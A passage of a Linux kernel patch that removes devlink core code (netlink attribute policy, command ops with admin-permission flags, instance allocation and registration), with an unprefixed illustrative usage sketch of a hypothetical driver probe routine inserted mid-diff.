+-	[DEVLINK_ATTR_PARAM_VALUE_CMODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_REGION_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_REGION_SNAPSHOT_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_REGION_CHUNK_ADDR] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_REGION_CHUNK_LEN] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK] =
+-		NLA_POLICY_BITFIELD32(DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS),
+-	[DEVLINK_ATTR_TRAP_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_TRAP_ACTION] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_TRAP_GROUP_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_NETNS_PID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_NETNS_FD] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_NETNS_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_TRAP_POLICER_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_TRAP_POLICER_RATE] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_TRAP_POLICER_BURST] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_PORT_FUNCTION] = { .type = NLA_NESTED },
+-	[DEVLINK_ATTR_RELOAD_ACTION] = NLA_POLICY_RANGE(NLA_U8, DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-							DEVLINK_RELOAD_ACTION_MAX),
+-	[DEVLINK_ATTR_RELOAD_LIMITS] = NLA_POLICY_BITFIELD32(DEVLINK_RELOAD_LIMITS_VALID_MASK),
+-	[DEVLINK_ATTR_PORT_FLAVOUR] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_PORT_PCI_PF_NUMBER] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_PORT_PCI_SF_NUMBER] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_RATE_TYPE] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_RATE_TX_SHARE] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_RATE_TX_MAX] = { .type = NLA_U64 },
+-	[DEVLINK_ATTR_RATE_NODE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_LINECARD_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_LINECARD_TYPE] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_SELFTESTS] = { .type = NLA_NESTED },
+-};
+-
+-static const struct genl_small_ops devlink_nl_ops[] = {
+-	{
+-		.cmd = DEVLINK_CMD_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_get_doit,
+-		.dumpit = devlink_nl_cmd_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_get_doit,
+-		.dumpit = devlink_nl_cmd_port_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_GET,
+-		.doit = devlink_nl_cmd_rate_get_doit,
+-		.dumpit = devlink_nl_cmd_rate_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_SET,
+-		.doit = devlink_nl_cmd_rate_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_NEW,
+-		.doit = devlink_nl_cmd_rate_new_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RATE_DEL,
+-		.doit = devlink_nl_cmd_rate_del_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE_NODE,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_SPLIT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_split_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_UNSPLIT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_unsplit_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_NEW,
+-		.doit = devlink_nl_cmd_port_new_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_DEL,
+-		.doit = devlink_nl_cmd_port_del_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_LINECARD_GET,
+-		.doit = devlink_nl_cmd_linecard_get_doit,
+-		.dumpit = devlink_nl_cmd_linecard_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_LINECARD_SET,
+-		.doit = devlink_nl_cmd_linecard_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_POOL_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_pool_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_pool_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_POOL_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_pool_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_PORT_POOL_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_port_pool_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_port_pool_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_PORT_POOL_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_port_pool_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_tc_pool_bind_get_doit,
+-		.dumpit = devlink_nl_cmd_sb_tc_pool_bind_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_tc_pool_bind_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_OCC_SNAPSHOT,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_occ_snapshot_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SB_OCC_MAX_CLEAR,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_sb_occ_max_clear_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_ESWITCH_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_eswitch_get_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_ESWITCH_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_eswitch_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_TABLE_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_table_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_ENTRIES_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_entries_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_HEADERS_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_headers_get,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_dpipe_table_counters_set,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RESOURCE_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_resource_set,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RESOURCE_DUMP,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_resource_dump,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_RELOAD,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_reload,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PARAM_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_param_get_doit,
+-		.dumpit = devlink_nl_cmd_param_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PARAM_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_param_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_PARAM_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_param_get_doit,
+-		.dumpit = devlink_nl_cmd_port_param_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_PORT_PARAM_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_port_param_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_get_doit,
+-		.dumpit = devlink_nl_cmd_region_get_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_NEW,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_new,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_DEL,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_region_del,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_REGION_READ,
+-		.validate = GENL_DONT_VALIDATE_STRICT |
+-			    GENL_DONT_VALIDATE_DUMP_STRICT,
+-		.dumpit = devlink_nl_cmd_region_read_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_INFO_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_info_get_doit,
+-		.dumpit = devlink_nl_cmd_info_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_get_doit,
+-		.dumpit = devlink_nl_cmd_health_reporter_get_dumpit,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_SET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_RECOVER,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_recover_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_diagnose_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT |
+-			    GENL_DONT_VALIDATE_DUMP_STRICT,
+-		.dumpit = devlink_nl_cmd_health_reporter_dump_get_dumpit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_dump_clear_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_HEALTH_REPORTER_TEST,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_health_reporter_test_doit,
+-		.flags = GENL_ADMIN_PERM,
+-		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_FLASH_UPDATE,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = devlink_nl_cmd_flash_update,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GET,
+-		.doit = devlink_nl_cmd_trap_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_SET,
+-		.doit = devlink_nl_cmd_trap_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GROUP_GET,
+-		.doit = devlink_nl_cmd_trap_group_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_group_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_GROUP_SET,
+-		.doit = devlink_nl_cmd_trap_group_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_POLICER_GET,
+-		.doit = devlink_nl_cmd_trap_policer_get_doit,
+-		.dumpit = devlink_nl_cmd_trap_policer_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_TRAP_POLICER_SET,
+-		.doit = devlink_nl_cmd_trap_policer_set_doit,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SELFTESTS_GET,
+-		.doit = devlink_nl_cmd_selftests_get_doit,
+-		.dumpit = devlink_nl_cmd_selftests_get_dumpit,
+-		/* can be retrieved by unprivileged users */
+-	},
+-	{
+-		.cmd = DEVLINK_CMD_SELFTESTS_RUN,
+-		.doit = devlink_nl_cmd_selftests_run,
+-		.flags = GENL_ADMIN_PERM,
+-	},
+-};
+-
+-static struct genl_family devlink_nl_family __ro_after_init = {
+-	.name		= DEVLINK_GENL_NAME,
+-	.version	= DEVLINK_GENL_VERSION,
+-	.maxattr	= DEVLINK_ATTR_MAX,
+-	.policy = devlink_nl_policy,
+-	.netnsok	= true,
+-	.parallel_ops	= true,
+-	.pre_doit	= devlink_nl_pre_doit,
+-	.post_doit	= devlink_nl_post_doit,
+-	.module		= THIS_MODULE,
+-	.small_ops	= devlink_nl_ops,
+-	.n_small_ops	= ARRAY_SIZE(devlink_nl_ops),
+-	.resv_start_op	= DEVLINK_CMD_SELFTESTS_RUN + 1,
+-	.mcgrps		= devlink_nl_mcgrps,
+-	.n_mcgrps	= ARRAY_SIZE(devlink_nl_mcgrps),
+-};
+-
+-static bool devlink_reload_actions_valid(const struct devlink_ops *ops)
+-{
+-	const struct devlink_reload_combination *comb;
+-	int i;
+-
+-	if (!devlink_reload_supported(ops)) {
+-		if (WARN_ON(ops->reload_actions))
+-			return false;
+-		return true;
+-	}
+-
+-	if (WARN_ON(!ops->reload_actions ||
+-		    ops->reload_actions & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
+-		    ops->reload_actions >= BIT(__DEVLINK_RELOAD_ACTION_MAX)))
+-		return false;
+-
+-	if (WARN_ON(ops->reload_limits & BIT(DEVLINK_RELOAD_LIMIT_UNSPEC) ||
+-		    ops->reload_limits >= BIT(__DEVLINK_RELOAD_LIMIT_MAX)))
+-		return false;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++) {
+-		comb = &devlink_reload_invalid_combinations[i];
+-		if (ops->reload_actions == BIT(comb->action) &&
+-		    ops->reload_limits == BIT(comb->limit))
+-			return false;
+-	}
+-	return true;
+-}
+-
+-/**
+- *	devlink_set_features - Set devlink supported features
+- *
+- *	@devlink: devlink
+- *	@features: devlink supported features
+- *
+- *	This interface allows us to set reload ops separately from
+- *	the devlink_alloc.
+- */
+-void devlink_set_features(struct devlink *devlink, u64 features)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	WARN_ON(features & DEVLINK_F_RELOAD &&
+-		!devlink_reload_supported(devlink->ops));
+-	devlink->features = features;
+-}
+-EXPORT_SYMBOL_GPL(devlink_set_features);
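Usage sketch (illustrative only, not part of the patch; the foo_* names are
hypothetical): devlink_set_features() sits between allocation and
registration, pairing the DEVLINK_F_RELOAD flag with reload-capable ops:

	static int foo_probe(struct pci_dev *pdev, const struct pci_device_id *id)
	{
		struct devlink *devlink;

		/* Allocation returns an unregistered instance. */
		devlink = devlink_alloc(&foo_devlink_ops, sizeof(struct foo_priv),
					&pdev->dev);
		if (!devlink)
			return -ENOMEM;

		/* Legal only while the instance is still unregistered. */
		devlink_set_features(devlink, DEVLINK_F_RELOAD);

		devlink_register(devlink);
		return 0;
	}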
+-
+-/**
+- *	devlink_alloc_ns - Allocate new devlink instance resources
+- *	in a specific namespace
+- *
+- *	@ops: ops
+- *	@priv_size: size of user private data
+- *	@net: net namespace
+- *	@dev: parent device
+- *
+- *	Allocate new devlink instance resources, including devlink index
+- *	and name.
+- */
+-struct devlink *devlink_alloc_ns(const struct devlink_ops *ops,
+-				 size_t priv_size, struct net *net,
+-				 struct device *dev)
+-{
+-	struct devlink *devlink;
+-	static u32 last_id;
+-	int ret;
+-
+-	WARN_ON(!ops || !dev);
+-	if (!devlink_reload_actions_valid(ops))
+-		return NULL;
+-
+-	devlink = kzalloc(sizeof(*devlink) + priv_size, GFP_KERNEL);
+-	if (!devlink)
+-		return NULL;
+-
+-	ret = xa_alloc_cyclic(&devlinks, &devlink->index, devlink, xa_limit_31b,
+-			      &last_id, GFP_KERNEL);
+-	if (ret < 0) {
+-		kfree(devlink);
+-		return NULL;
+-	}
+-
+-	devlink->dev = dev;
+-	devlink->ops = ops;
+-	xa_init_flags(&devlink->snapshot_ids, XA_FLAGS_ALLOC);
+-	write_pnet(&devlink->_net, net);
+-	INIT_LIST_HEAD(&devlink->port_list);
+-	INIT_LIST_HEAD(&devlink->rate_list);
+-	INIT_LIST_HEAD(&devlink->linecard_list);
+-	INIT_LIST_HEAD(&devlink->sb_list);
+-	INIT_LIST_HEAD_RCU(&devlink->dpipe_table_list);
+-	INIT_LIST_HEAD(&devlink->resource_list);
+-	INIT_LIST_HEAD(&devlink->param_list);
+-	INIT_LIST_HEAD(&devlink->region_list);
+-	INIT_LIST_HEAD(&devlink->reporter_list);
+-	INIT_LIST_HEAD(&devlink->trap_list);
+-	INIT_LIST_HEAD(&devlink->trap_group_list);
+-	INIT_LIST_HEAD(&devlink->trap_policer_list);
+-	lockdep_register_key(&devlink->lock_key);
+-	mutex_init(&devlink->lock);
+-	lockdep_set_class(&devlink->lock, &devlink->lock_key);
+-	mutex_init(&devlink->reporters_lock);
+-	mutex_init(&devlink->linecards_lock);
+-	refcount_set(&devlink->refcount, 1);
+-	init_completion(&devlink->comp);
+-
+-	return devlink;
+-}
+-EXPORT_SYMBOL_GPL(devlink_alloc_ns);
+-
+-static void
+-devlink_trap_policer_notify(struct devlink *devlink,
+-			    const struct devlink_trap_policer_item *policer_item,
+-			    enum devlink_command cmd);
+-static void
+-devlink_trap_group_notify(struct devlink *devlink,
+-			  const struct devlink_trap_group_item *group_item,
+-			  enum devlink_command cmd);
+-static void devlink_trap_notify(struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd);
+-
+-static void devlink_notify_register(struct devlink *devlink)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct devlink_trap_group_item *group_item;
+-	struct devlink_param_item *param_item;
+-	struct devlink_trap_item *trap_item;
+-	struct devlink_port *devlink_port;
+-	struct devlink_linecard *linecard;
+-	struct devlink_rate *rate_node;
+-	struct devlink_region *region;
+-
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-	list_for_each_entry(linecard, &devlink->linecard_list, list)
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list)
+-		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-
+-	list_for_each_entry(policer_item, &devlink->trap_policer_list, list)
+-		devlink_trap_policer_notify(devlink, policer_item,
+-					    DEVLINK_CMD_TRAP_POLICER_NEW);
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list)
+-		devlink_trap_group_notify(devlink, group_item,
+-					  DEVLINK_CMD_TRAP_GROUP_NEW);
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list)
+-		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
+-
+-	list_for_each_entry(rate_node, &devlink->rate_list, list)
+-		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
+-
+-	list_for_each_entry(region, &devlink->region_list, list)
+-		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	list_for_each_entry(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item,
+-				     DEVLINK_CMD_PARAM_NEW);
+-}
+-
+-static void devlink_notify_unregister(struct devlink *devlink)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct devlink_trap_group_item *group_item;
+-	struct devlink_param_item *param_item;
+-	struct devlink_trap_item *trap_item;
+-	struct devlink_port *devlink_port;
+-	struct devlink_rate *rate_node;
+-	struct devlink_region *region;
+-
+-	list_for_each_entry_reverse(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item,
+-				     DEVLINK_CMD_PARAM_DEL);
+-
+-	list_for_each_entry_reverse(region, &devlink->region_list, list)
+-		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
+-
+-	list_for_each_entry_reverse(rate_node, &devlink->rate_list, list)
+-		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
+-
+-	list_for_each_entry_reverse(trap_item, &devlink->trap_list, list)
+-		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
+-
+-	list_for_each_entry_reverse(group_item, &devlink->trap_group_list, list)
+-		devlink_trap_group_notify(devlink, group_item,
+-					  DEVLINK_CMD_TRAP_GROUP_DEL);
+-	list_for_each_entry_reverse(policer_item, &devlink->trap_policer_list,
+-				    list)
+-		devlink_trap_policer_notify(devlink, policer_item,
+-					    DEVLINK_CMD_TRAP_POLICER_DEL);
+-
+-	list_for_each_entry_reverse(devlink_port, &devlink->port_list, list)
+-		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
+-	devlink_notify(devlink, DEVLINK_CMD_DEL);
+-}
+-
+-/**
+- *	devlink_register - Register devlink instance
+- *
+- *	@devlink: devlink
+- */
+-void devlink_register(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-	/* Make sure that we are in the .probe() routine */
+-
+-	xa_set_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
+-	devlink_notify_register(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_register);
+-
+-/**
+- *	devlink_unregister - Unregister devlink instance
+- *
+- *	@devlink: devlink
+- */
+-void devlink_unregister(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_REGISTERED(devlink);
+-	/* Make sure that we are in the .remove() routine */
+-
+-	xa_set_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
+-	devlink_put(devlink);
+-	wait_for_completion(&devlink->comp);
+-
+-	devlink_notify_unregister(devlink);
